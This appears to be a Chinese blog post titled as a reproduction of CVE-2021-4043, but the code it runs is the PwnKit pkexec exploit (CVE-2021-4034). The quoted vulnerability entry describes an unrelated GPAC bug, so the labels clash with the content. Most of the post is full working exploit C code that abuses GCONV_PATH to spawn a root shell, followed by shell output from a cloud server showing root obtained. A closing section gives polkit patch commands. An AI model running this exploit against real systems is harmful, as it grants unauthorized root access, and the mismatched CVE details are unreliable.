实验步骤

文章目录

  • 实验步骤
  • CVE-2021-4043 Linux本地提权漏洞
  • 实验背景
  • 实验环境
  • 漏洞复现
    • 构造payload
    • 用gcc编译后上传到阿里云
    • 执行payload
  • 漏洞修复

CVE-2021-4043 Linux本地提权漏洞

CNVD-ID CNVD-2022-22323
公开日期 2022-03-24
危害级别 中 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
影响产品 GPAC GPAC <1.1.0
CVE ID CVE-2021-4043
漏洞描述 GPAC是一款开源的多媒体框架。
GPAC 1.1.0之前版本存在代码问题漏洞,该漏洞源于软件中存在NULL指针解引用。目前没有详细漏洞细节提供
漏洞类型 通用型漏洞
参考链接 https://nvd.nist.gov/vuln/detail/CVE-2021-4043
漏洞解决方案 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/gpac/gpac/commit/64a2e1b799352ac7d7aad1989bc06e7b0f2b01db
厂商补丁 gpac代码问题漏洞(CNVD-2022-22323)的补丁
验证信息 (暂无验证信息)
报送时间 2022-02-10
收录时间 2022-03-24
更新时间 2022-03-24

实验背景

今天登录阿里云服务器突然发现了一个提权漏洞,先利用一波玩玩。

实验环境

  • 带有漏洞的centos7系统

  • 附带编译好的palyload下载链接CVE-2021-4034

漏洞复现

构造payload

在GitHub找到了payloadhttps://github.com/arthepsy/CVE-2021-4034

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>char *shell = "#include <stdio.h>\n""#include <stdlib.h>\n""#include <unistd.h>\n\n""void gconv() {}\n""void gconv_init() {\n""  setuid(0); setgid(0);\n"" seteuid(0); setegid(0);\n""   system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n""    exit(0);\n""}";int main(int argc, char *argv[]) {FILE *fp;system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");fp = fopen("pwnkit/pwnkit.c", "w");fprintf(fp, "%s", shell);fclose(fp);system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
用gcc编译后上传到阿里云
[root@local ~]# touch cve20124043.c
[root@local ~]# vim cve20124043.c
[root@local ~]# ls
cve20124043.c
[root@local ~]# gcc cve20124043.c   -o cve20124043
[root@local ~]# ls
cve20124043  cve20124043.c

执行payload
[rabbit@iZj6c2ktpckmd5r3q2dfrhZ ~]$ ls
cve20124043                                                //上传编译好的paload  [rabbit@iZj6c2ktpckmd5r3q2dfrhZ ~]$ id                     //查看用户为rabbituid=1004(rabbit) gid=1004(rabbit) groups=1004(rabbit)
[rabbit@iZj6c2ktpckmd5r3q2dfrhZ ~]$ ./cve20124043          //执行payloadsh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1004(rabbit)        //成功提权

漏洞修复

CentOS 用户可采用如下命令升级到安全版本或更高版本:

yum clean all && yum makecache yum update polkit -y

验证修复,通过以下命令可查看 Polkit 是否为安全版本:

rpm -qa polkit

Ubuntu 用户可采用如下命令升级至安全版本或更高版本:

sudo apt-get update sudo apt-get install policykit-1

验证修复,通过以下命令可查看 Polkit 是否为安全版本:

dpkg -l policykit-1

原文链接https://qu1u1.cn/archives/cve-2021-4043

【CVE-2021-4043】Linux本地提权漏洞复现相关推荐

  1. 脏牛Linux本地提权漏洞复现(CVE-2016-5195、Linux、Android、提权)

    漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞 ...

  2. 脏牛Linux本地提权漏洞复现(CVE2016-5195)

    漏洞介绍: 脏牛漏洞(CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响.恶意攻击者可以轻易绕 ...

  3. CVE-2021-3560-POLKIT本地提权漏洞复现

    Polkit 0.105-26 0.117-2 - Local Privilege Escalation Exploit! Tested on Ubuntu20.10 Linux localhost ...

  4. sqlite字段是否存在_【漏洞预警】Linux内核存在本地提权漏洞(CVE20198912)

    更多资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn) 漏洞背景 近日,Linux git中发布一个commit补丁,该补丁对应的漏洞是一个本地 ...

  5. Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328

    Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...

  6. Linux 系统安全 - 近期发现的 polkit pkexec 本地提权漏洞(CVE-2021-4034)修复方案

    时间: 20220-1-25 事件: qualys 安全研究人员披露 CVE-2021-4034 polkit pkexec 本地提权漏洞细节. 漏洞描述: polkit pkexec 中对命令行参数 ...

  7. linux自动更新漏洞,Linux爆本地提权漏洞 请立即更新udev程序

    Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序.(2.4内核系统不受影响) 修复方法(修复前请备份重要数据): debian用户请执行apt-get ...

  8. Linux爆本地提权漏洞 请立即更新udev程序

    Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序.(2.4内核系统不受影响) 修复方法(修复前请备份重要数据): debian用户请执行apt-get ...

  9. Dirty Pipe – Linux 内核本地提权漏洞

    一.漏洞简介 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞.攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root ...

最新文章

  1. 南京大学计算机2010年本科录取名单,2010高考本科录取名单
  2. for循环的一些困惑解决(字符串)
  3. 机器学习入门学习资源
  4. PHP的几种排序算法的比较
  5. (二十)深入浅出TCPIP之epoll的一些思考
  6. C语言文件读写(输入输出重定向)
  7. web开发规范 - 图片规范
  8. Yate软交换机IPPBX与电话语音网关的初步配合
  9. linux查看服务器防火墙策略,linux防火墙的策略规则
  10. mysql全文索引详解_MySql全文索引详解
  11. 数据挖掘从业人员的愿景
  12. wordpress主题安装,wp主题模板安装技巧
  13. vue3实战项目——网易云App【01-项目准备】
  14. Gensim学习笔记-1--理解corpora.Dictionary
  15. 21天转型容器实战营(八容器进阶之Kubernetes 应用生命周期原理分析)
  16. 高斯混合分布EM算法
  17. 地铁无线cad服务器,地铁车站设计CAD图纸(完整)(dwg)
  18. 查看Linux系统有几块网卡
  19. js逆向 签名参数解析 驾考数据科目一科目三题库爬虫分享 python scrapy
  20. 策略研究品价差套策(源码)

热门文章

  1. 调用百度网盘开放平台接口,操作百度网盘中的文件,上传、下载等
  2. 母版页的详细使用介绍
  3. Linux命令行模式启动VMware时vmnet-dhcpd和vmnet-natd进程无法启动 VMware进程不全 解决办法
  4. 华为手机自带浏览器不支持 ES6 语法
  5. PyEcharts 之 仪表盘
  6. dma_alloc_coherent 申请内存用法和问题总结
  7. 「 OFFICE 」将Excel的sheet拆分成独立文件的方法
  8. 图像聚光灯 Image Spotlight for Vue
  9. VB读取武林外传内存地址
  10. 鸭鸭来袭--官方下载